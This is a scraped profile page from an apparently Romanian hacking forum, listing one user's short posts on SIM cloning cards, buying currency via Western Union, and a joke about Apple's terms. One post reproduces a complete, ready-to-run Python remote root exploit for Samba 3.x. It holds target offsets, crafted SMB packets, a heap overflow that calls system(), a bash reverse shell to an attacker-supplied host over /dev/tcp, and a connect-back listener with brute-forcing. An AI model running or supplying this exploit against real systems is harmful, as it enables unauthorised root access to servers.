Jump to content

pukamvp

Active Members
  • Posts

    65
  • Joined

  • Last visited

Converted

  • Occupation
    Pianist
  • Interests
    Travel
  • Biography
    Don`t Do IT
  • Location
    /usr/games

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

pukamvp's Achievements

Newbie

Newbie (1/14)

20

Reputation

  1. pukamvp

    Sim clone.

    Am vazut intr-un post acum cateva zile se discuta despre Sim cloning. 5-Pack of SIM Cloning Cards Rewritable MOBILedit! Online Shop - (#300531649) 5-Pack of SIM Cloning Cards Rewritable - New SIM Clone package – set of empty, rewritable SIM cards, fast worldwide shipping. It works with SIM clone feature of MOBILedit Forensic. SIM Clone - new application f Aveti acolo tot ce vreti.
  2. Pm me.
  3. Tu chiar nu citesti ? # found by eax samba 0day godz (loljk)
  4. This is a Samba 3.x 0-day remote root exploit that was disclosed via pastebin/full disclosure!!! #!/usr/bin/python # # finding targets 4 31337z: # gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1' # -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell # found by eax samba 0day godz (loljk) from binascii import hexlify, unhexlify import socket import threading import SocketServer import sys import os import time import struct targets = [ { "name" : "samba_3.6.3-debian6", "chunk_offset" : 0x9148, "system_libc_offset" : 0xb6d003c0 }, { "name" : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)", "chunk_offset" : 4560, "system_libc_offset" : 0xb20 }, { "name" : "target_finder (hardcode correct system addr)", "chunk_offset" : 0, "system_libc_offset" : 0xb6d1a3c0, "finder": True } ] do_brute = True rs = 1024 FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) def dump(src, length=32): result=[] for i in xrange(0, len(src), length): s = src[i:i+length] hexa = ' '.join(["%02x"%ord(x) for x in s]) printable = s.translate(FILTER) result.append("%04x %-*s %s\n" % (i, length*3, hexa, printable)) return ''.join(result) sploitshake = [ # HELLO "8100004420434b4644454e4543464445" + \ "46464346474546464343414341434143" + \ "41434143410020454745424644464545" + \ "43455046494341434143414341434143" + \ "4143414341414100", # NTLM_NEGOT "0000002fff534d427200000000000000" + \ "00000000000000000000000000001d14" + \ "00000000000c00024e54204c4d20302e" + \ "313200", # SESSION_SETUP "0000004bff534d427300000000080000" + \ "000000000000000000000000ffff1d14" + \ "000000000dff000000ffff02001d1499" + \ "1f00000000000000000000010000000e" + \ "000000706f736978007079736d6200", # TREE_CONNECT "00000044ff534d427500000000080000" + \ "000000000000000000000000ffff1d14" + \ "6400000004ff00000000000100190000" + \ "5c5c2a534d425345525645525c495043" + \ "24003f3f3f3f3f00", # NT_CREATE "00000059ff534d42a200000000180100" + \ "00000000000000000000000001001d14" + \ "6400000018ff00000000050016000000" + \ "000000009f0102000000000000000000" + \ "00000000030000000100000040000000" + \ "020000000306005c73616d7200" ] pwnsauce = { 'smb_bind': \ "00000092ff534d422500000000000100" + \ "00000000000000000000000001001d14" + \ "6400000010000048000004e0ff000000" + \ "0000000000000000004a0048004a0002" + \ "002600babe4f005c504950455c000500" + \ "0b03100000004800000001000000b810" + \ "b8100000000001000000000001007857" + \ "34123412cdabef000123456789ab0000" + \ "0000045d888aeb1cc9119fe808002b10" + \ "486002000000", 'data_chunk': \ "000010efff534d422f00000000180000" + \ "00000000000000000000000001001d14" + \ "640000000eff000000babe00000000ff" + \ "0000000800b0100000b0103f00000000" + \ "00b0100500000110000000b010000001" + \ "0000009810000000000800", 'final_chunk': \ "000009a3ff534d422f00000000180000" + \ "00000000000000000000000001001d14" + \ "640000000eff000000babe00000000ff" + \ "00000008006409000064093f00000000" + \ "00640905000002100000006409000001" + \ "0000004c09000000000800" } def exploit(host, port, cbhost, cbport, target): global sploitshake, pwnsauce chunk_size = 4248 target_tcp = (host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target_tcp) n = 0 for pkt in sploitshake: s.send(unhexlify(pkt)) pkt_res = s.recv(rs) n = n+1 fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b]) s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid))) pkt_res = s.recv(rs) buf = "X"*20 # policy handle level = 2 #LSA_POLICY_INFO_AUDIT_EVENTS buf+=struct.pack('<H',level) # level buf+=struct.pack('<H',level)# level2 buf+=struct.pack('<L',1)#auditing_mode buf+=struct.pack('<L',1)#ptr buf+=struct.pack('<L',100000) # r->count buf+=struct.pack('<L',20) # array_size buf+=struct.pack('<L',0) buf+=struct.pack('<L',100) buf += ("A" * target['chunk_offset']) buf+=struct.pack("I", 0); buf+=struct.pack("I", target['system_libc_offset']); buf+=struct.pack("I", 0); buf+=struct.pack("I", target['system_libc_offset']); buf+=struct.pack("I", 0xe8150c70); buf+="AAAABBBB" cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00" tmp = cmd*(816/len(cmd)) tmp += "\x00"*(816-len(tmp)) buf+=tmp buf+="A"*(37192-target['chunk_offset']) buf+='z'*(100000 - (28000 + 10000)) buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)] n=0 for chunk in buf_chunks: if len(chunk) != chunk_size: #print "LAST CHUNK #%d" % n bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk s.send(bb) else: #print "CHUNK #%d" % n bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk s.send(bb) retbuf = s.recv(rs) n=n+1 s.close() class connectback_shell(SocketServer.BaseRequestHandler): def handle(self): global do_brute print "\n[!] connectback shell from %s" % self.client_address[0] do_brute = False s = self.request import termios, tty, select, os old_settings = termios.tcgetattr(0) try: tty.setcbreak(0) c = True while c: for i in select.select([0, s.fileno()], [], [], 0)[0]: c = os.read(i, 1024) if c: if i == 0: os.write(1, c) os.write(s.fileno() if i == 0 else 1, c) except KeyboardInterrupt: pass finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) return class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass if len(sys.argv) != 6: print "\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n" print " usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0]) print " targets:" i = 0 for target in targets: print " %02d) %s" % (i, target['name']) i = i+1 print "" sys.exit(-1) target = targets[int(sys.argv[5])] server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() while do_brute == True: sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset'])) sys.stdout.flush() exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target) if "finder" in target: target['chunk_offset'] += 4 else: target['system_libc_offset'] += 0x1000 if "finder" in target: print \ "{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \ "system_libc_offset = 0x%03x" % \ (target['chunk_offset'], target['system_libc_offset'] & 0xff000fff) while 1: time.sleep(999) server.shutdown()
  5. Io.kent asculta sfatul lui B3st
  6. Link updated please?
  7. The file You are looking for... may be deleted by the user or by the Administrator !
  8. Sunt mai multe nu doar unul!
  9. 30 dolari e mult comision zic eu pt 50
  10. Dupa cum spune titlul cumpar 50 LR. Pm me! Plata Western!
  11. If you don't want to be used for the next human centipad... you better read what you've AGREED to when you REGISTER your rights away to a company. Don't just ASSUME... You'll be sorry eventually! Clause 37b pf the End Used Agreement clearly states; " Users accept that Apple Inc. be granted full and immediate access to the first born of whatever children they might have, with the right to full custody. Further to this, the former legal guardians will have no right to appeal" https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-ash4/268695_444747862231624_831259699_n.jpg Sursa : https://www.facebook.com/pages/Occupy-Ottawa/262695307103548
  12. hint pass?
×
×
  • Create New...